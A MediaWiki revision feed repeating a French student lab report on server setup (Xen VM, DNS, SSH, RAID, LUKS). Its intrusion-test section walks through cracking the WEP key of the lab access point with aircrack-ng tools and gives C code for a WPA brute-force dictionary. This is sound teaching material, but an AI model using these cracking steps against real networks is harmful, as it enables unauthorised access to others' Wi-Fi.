 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54101</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54101"/>
				<updated>2020-11-30T15:35:52Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54098</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54098"/>
				<updated>2020-11-30T15:34:00Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Site Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
